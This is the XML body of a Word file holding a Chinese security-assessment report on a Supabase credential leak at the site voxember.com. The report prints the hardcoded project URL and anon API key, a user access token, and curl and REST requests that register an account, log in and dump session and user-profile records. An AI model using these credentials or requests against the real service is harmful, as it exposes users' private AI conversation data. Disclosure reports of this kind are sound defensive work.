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BA68F"/>
    <w:p w14:paraId="5A91A61F"/>
    <w:p w14:paraId="209EDBDD"/>
    <w:p w14:paraId="096576A5"/>
    <w:p w14:paraId="148544C0"/>
    <w:p w14:paraId="57AB450D"/>
    <w:p w14:paraId="6084F29D"/>
    <w:p w14:paraId="675C6AA4"/>
    <w:p w14:paraId="5F740E36"/>
    <w:p w14:paraId="02521865"/>
    <w:p w14:paraId="227E87F3"/>
    <w:p w14:paraId="6B324407">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上海生声不息科技有限公司</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>网站漏洞隐患分析报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0268ADB8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DD11FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3007B57C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>检测报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CA24B7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FEF406F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>经技术检测发现，你单位系统存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>个疑似安全隐患，已人工确</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>个。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6887AA24">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="楷体"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="楷体"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Supabase凭据泄露漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37971809">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="楷体"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="楷体"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.1.漏洞信息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7390"/>
      </w:tblGrid>
      <w:tr w14:paraId="2CDC4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240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A81D11C">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>发现时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7390" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="213FEFB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2026-07-</w:t>
            </w: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36B67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 w14:paraId="1A07FCCA">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>告警类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7390" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F79978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信息泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="72EF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240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11F54863">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>系统名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7390" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09E6B664">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>燃言</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3B2A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 w14:paraId="736C9861">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>漏洞url</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7390" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6349C1F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https://voxember.com/_next/static/chunks/196-fe2d8da4c6396105.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="10165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 w14:paraId="56B1C034">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>详情</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7390" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D97436B">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5B1E62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通过客户端JS逆向发现硬编码API凭据，利用凭据注册有效用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67C010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 https://voxember.com 的JS中发现:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A0EF22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https://voxember.com/_next/static/chunks/196-fe2d8da4c6396105.js</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C5DB13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// 客户端Supabase初始化(完整凭据硬编码)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3751C4E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o="https://dhrobrmaktietyinlluv.supabase.co",a="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImRocm9icm1ha3RpZXR5aW5sbHV2Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3NjcwODQxNTAsImV4cCI6MjA4MjY2MDE1MH0.92qAfXlEv6F2z8EhfY4Ego0jC7y51pQ4jcqdraSbJQg",</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E5756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0" distR="0">
                  <wp:extent cx="4655820" cy="2555240"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="6985"/>
                  <wp:docPr id="1714647259" name="图片 1714647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647259" name="图片 171464725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820" cy="25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3F0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利用获取到的API Key注册Supabase用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="094F3E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curl -X POST -H "apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImRocm9icm1ha3RpZXR5aW5sbHV2Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3NjcwODQxNTAsImV4cCI6MjA4MjY2MDE1MH0.92qAfXlEv6F2z8EhfY4Ego0jC7y51pQ4jcqdraSbJQg" \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F3059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  -H "Content-Type: application/json" \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14E3DD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  -d '{"email":"test1@poc.com","password":"Test123!@#"}' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29B984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  "https://dhrobrmaktietyinlluv.supabase.co/auth/v1/signup"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="661FAB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0" distR="0">
                  <wp:extent cx="4522470" cy="884555"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="1270"/>
                  <wp:docPr id="701941087" name="图片 701941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941087" name="图片 70194108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2470" cy="88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A76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</w:p>
          <w:p w14:paraId="169D865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使用注册的用户进行登陆，返回有效access Token</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2411F9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curl -X POST -H "apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImRocm9icm1ha3RpZXR5aW5sbHV2Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3NjcwODQxNTAsImV4cCI6MjA4MjY2MDE1MH0.92qAfXlEv6F2z8EhfY4Ego0jC7y51pQ4jcqdraSbJQg" \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4028C2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  -H "Content-Type: application/json" \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="246DDA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  -d '{"email":"test1@poc.com","password":"Test123!@#","grant_type":"password"}' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="446F16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  "https://dhrobrmaktietyinlluv.supabase.co/auth/v1/token?grant_type=password"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B75F2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</w:p>
          <w:p w14:paraId="69764F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0" distR="0">
                  <wp:extent cx="4432300" cy="934720"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="8255"/>
                  <wp:docPr id="2057941533" name="图片 2057941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941533" name="图片 20579415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0" cy="93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D81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</w:p>
          <w:p w14:paraId="14BAA46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利用用户accesstoken调用restapi获取AI对话数据、记忆约1750条</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DD403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</w:p>
          <w:p w14:paraId="6B325A1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带着API Token和Access Token访问REST API端点，</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F10165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 /rest/v1/sessions?select=* HTTP/2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52433D2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Host: dhrobrmaktietyinlluv.supabase.co</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FE514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Apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImRocm9icm1ha3RpZXR5aW5sbHV2Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3NjcwODQxNTAsImV4cCI6MjA4MjY2MDE1MH0.92qAfXlEv6F2z8EhfY4Ego0jC7y51pQ4jcqdraSbJQg</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56FBDC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Authorization: Bearer eyJhbGciOiJFUzI1NiIsImtpZCI6IjU2MzVmOGZkLTFlMzUtNGI2YS04ZTE5LTE2ZTg3NDlhNDA4NyIsInR5cCI6IkpXVCJ9.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.6nICgSyNdd4kT9ciDiOeug9QBpjk6kFvmEQbE0RO9o5ZTpcQKka_xpuU1o_h4x1VGAS_Oegi8PVZZjuXefskNw</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2076C41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0" distR="0">
                  <wp:extent cx="4599940" cy="2925445"/>
                  <wp:effectExtent l="0" t="0" r="635" b="8255"/>
                  <wp:docPr id="929964332" name="图片 929964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964332" name="图片 92996433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940" cy="292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D0C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 /rest/v1/user_profiles?select=* HTTP/2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="132AE41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Host: dhrobrmaktietyinlluv.supabase.co</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F06D7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Apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImRocm9icm1ha3RpZXR5aW5sbHV2Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3NjcwODQxNTAsImV4cCI6MjA4MjY2MDE1MH0.92qAfXlEv6F2z8EhfY4Ego0jC7y51pQ4jcqdraSbJQg</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B7CE0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Authorization: Bearer eyJhbGciOiJFUzI1NiIsImtpZCI6IjU2MzVmOGZkLTFlMzUtNGI2YS04ZTE5LTE2ZTg3NDlhNDA4NyIsInR5cCI6IkpXVCJ9.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.6nICgSyNdd4kT9ciDiOeug9QBpjk6kFvmEQbE0RO9o5ZTpcQKka_xpuU1o_h4x1VGAS_Oegi8PVZZjuXefskNw</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3844FF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0" distR="0">
                  <wp:extent cx="4309110" cy="2703830"/>
                  <wp:effectExtent l="0" t="0" r="5715" b="1270"/>
                  <wp:docPr id="55631176" name="图片 55631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31176" name="图片 5563117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110" cy="270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61333">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6A29B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 w14:paraId="441B0D6C">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>漏洞危害</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7390" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F5C9368">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>JS发现硬编码API凭据，导致数据泄漏</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20D03FBE">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="556DD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 w14:paraId="5D04D558">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>修复建议</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7390" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1ADBFF7F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>不要在JS中硬编码API凭据</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B7B5D93">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-C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7C40CB1"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="37C40C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jZjdjZDhiNmM4ZGNlOWQxYmRiY2NiMmY3ZmVmZDIifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00B47730"/>
    <w:rsid w:val="00034616"/>
    <w:rsid w:val="0006063C"/>
    <w:rsid w:val="00085F86"/>
    <w:rsid w:val="000B359C"/>
    <w:rsid w:val="000C66C7"/>
    <w:rsid w:val="001246F2"/>
    <w:rsid w:val="001256FE"/>
    <w:rsid w:val="0015074B"/>
    <w:rsid w:val="00170042"/>
    <w:rsid w:val="001C17EC"/>
    <w:rsid w:val="00204C7B"/>
    <w:rsid w:val="002937B7"/>
    <w:rsid w:val="0029639D"/>
    <w:rsid w:val="003126FF"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="00337CFA"/>
    <w:rsid w:val="003704DC"/>
    <w:rsid w:val="003D0FA5"/>
    <w:rsid w:val="004555BD"/>
    <w:rsid w:val="004C1B62"/>
    <w:rsid w:val="00582336"/>
    <w:rsid w:val="00582C10"/>
    <w:rsid w:val="005D3C3A"/>
    <w:rsid w:val="006032DA"/>
    <w:rsid w:val="00762F89"/>
    <w:rsid w:val="00777FC4"/>
    <w:rsid w:val="0079694A"/>
    <w:rsid w:val="007A0701"/>
    <w:rsid w:val="007B43B3"/>
    <w:rsid w:val="007F07CB"/>
    <w:rsid w:val="0089038B"/>
    <w:rsid w:val="00980B6D"/>
    <w:rsid w:val="00987B6D"/>
    <w:rsid w:val="009E10C1"/>
    <w:rsid w:val="00A63E39"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00AE66EE"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00B52690"/>
    <w:rsid w:val="00B712EE"/>
    <w:rsid w:val="00B82065"/>
    <w:rsid w:val="00BD1A1B"/>
    <w:rsid w:val="00BE2395"/>
    <w:rsid w:val="00C9763A"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00CF37F1"/>
    <w:rsid w:val="00CF4787"/>
    <w:rsid w:val="00D03618"/>
    <w:rsid w:val="00DD3E5C"/>
    <w:rsid w:val="00E30F69"/>
    <w:rsid w:val="00E96A7D"/>
    <w:rsid w:val="00F03957"/>
    <w:rsid w:val="00F44655"/>
    <w:rsid w:val="00F51763"/>
    <w:rsid w:val="00FC693F"/>
    <w:rsid w:val="0108501E"/>
    <w:rsid w:val="01A45894"/>
    <w:rsid w:val="01F20B44"/>
    <w:rsid w:val="02105BE7"/>
    <w:rsid w:val="03C9787A"/>
    <w:rsid w:val="05E9467A"/>
    <w:rsid w:val="079274EE"/>
    <w:rsid w:val="07990616"/>
    <w:rsid w:val="084E1401"/>
    <w:rsid w:val="09F73822"/>
    <w:rsid w:val="0CC34E4F"/>
    <w:rsid w:val="0D33560A"/>
    <w:rsid w:val="0D944891"/>
    <w:rsid w:val="117753AF"/>
    <w:rsid w:val="11AB1672"/>
    <w:rsid w:val="13935FA1"/>
    <w:rsid w:val="13DF3855"/>
    <w:rsid w:val="14FB2C5A"/>
    <w:rsid w:val="17326391"/>
    <w:rsid w:val="19233554"/>
    <w:rsid w:val="19370E41"/>
    <w:rsid w:val="193D65C3"/>
    <w:rsid w:val="1A383CBF"/>
    <w:rsid w:val="1AA77D9B"/>
    <w:rsid w:val="1B603823"/>
    <w:rsid w:val="21392563"/>
    <w:rsid w:val="228F5EE5"/>
    <w:rsid w:val="22D208C0"/>
    <w:rsid w:val="273A3040"/>
    <w:rsid w:val="28A60213"/>
    <w:rsid w:val="2DE862C2"/>
    <w:rsid w:val="2E455023"/>
    <w:rsid w:val="2EC75131"/>
    <w:rsid w:val="2FB90FA6"/>
    <w:rsid w:val="30290555"/>
    <w:rsid w:val="30314C8E"/>
    <w:rsid w:val="3234700A"/>
    <w:rsid w:val="33E43962"/>
    <w:rsid w:val="35AC09EA"/>
    <w:rsid w:val="35C96729"/>
    <w:rsid w:val="36166645"/>
    <w:rsid w:val="36D6375E"/>
    <w:rsid w:val="38495371"/>
    <w:rsid w:val="39920B14"/>
    <w:rsid w:val="39AA499F"/>
    <w:rsid w:val="3B353E36"/>
    <w:rsid w:val="3D527DF1"/>
    <w:rsid w:val="3D702473"/>
    <w:rsid w:val="3DE179BF"/>
    <w:rsid w:val="40D02AC3"/>
    <w:rsid w:val="40D1404D"/>
    <w:rsid w:val="446C760C"/>
    <w:rsid w:val="45ED50AE"/>
    <w:rsid w:val="468C4A5D"/>
    <w:rsid w:val="474803F0"/>
    <w:rsid w:val="4C2011AB"/>
    <w:rsid w:val="4DAB7D28"/>
    <w:rsid w:val="52546F29"/>
    <w:rsid w:val="52C83D07"/>
    <w:rsid w:val="52EC33C3"/>
    <w:rsid w:val="54212C9C"/>
    <w:rsid w:val="54E91F34"/>
    <w:rsid w:val="54FB1EDB"/>
    <w:rsid w:val="55414833"/>
    <w:rsid w:val="59C730D0"/>
    <w:rsid w:val="59FD26A3"/>
    <w:rsid w:val="5AF7469F"/>
    <w:rsid w:val="5CF4486C"/>
    <w:rsid w:val="5DD2401F"/>
    <w:rsid w:val="5EAF3929"/>
    <w:rsid w:val="62224AC0"/>
    <w:rsid w:val="63375B0A"/>
    <w:rsid w:val="63612F0B"/>
    <w:rsid w:val="67A23AF2"/>
    <w:rsid w:val="68BC2394"/>
    <w:rsid w:val="6CCB2025"/>
    <w:rsid w:val="6D741A8D"/>
    <w:rsid w:val="6EFC0D9C"/>
    <w:rsid w:val="716165D2"/>
    <w:rsid w:val="77277218"/>
    <w:rsid w:val="783633E4"/>
    <w:rsid w:val="79FE0DC7"/>
    <w:rsid w:val="7AAD65DE"/>
    <w:rsid w:val="7F11393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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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Balloon Text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="166"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="25">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="138"/>
    <w:autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="26">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="137"/>
    <w:autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="27">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="144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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="22"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="135">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="133"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="20"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="136">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="133"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="137">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="133"/>
    <w:link w:val="26"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="138">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="133"/>
    <w:link w:val="25"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="139">
    <w:name w:val="No Spacing"/>
    <w:autoRedefine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3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3"/>
    <w:link w:val="32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3"/>
    <w:link w:val="27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3"/>
    <w:link w:val="19"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="147">
    <w:name w:val="正文文本 2 字符"/>
    <w:basedOn w:val="133"/>
    <w:link w:val="29"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="148">
    <w:name w:val="正文文本 3 字符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宏文本 字符"/>
    <w:basedOn w:val="133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5 字符"/>
    <w:basedOn w:val="133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标题 6 字符"/>
    <w:basedOn w:val="133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标题 7 字符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标题 8 字符"/>
    <w:basedOn w:val="133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标题 9 字符"/>
    <w:basedOn w:val="133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字符"/>
    <w:basedOn w:val="133"/>
    <w:link w:val="158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强调1"/>
    <w:basedOn w:val="133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明显强调1"/>
    <w:basedOn w:val="133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参考1"/>
    <w:basedOn w:val="133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明显参考1"/>
    <w:basedOn w:val="133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书籍标题1"/>
    <w:basedOn w:val="133"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="33"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="165">
    <w:name w:val="TOC 标题1"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="166">
    <w:name w:val="批注框文本 字符"/>
    <w:basedOn w:val="133"/>
    <w:link w:val="24"/>
    <w:autoRedefine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167">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="13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82CF34-1911-43DF-A558-B13C9D11E1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550</Words>
  <Characters>1522</Characters>
  <Lines>9</Lines>
  <Paragraphs>2</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1526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2024-09-02T02:37:00Z</dcterms:created>
  <dc:creator>python-docx</dc:creator>
  <dc:description>generated by python-docx</dc:description>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
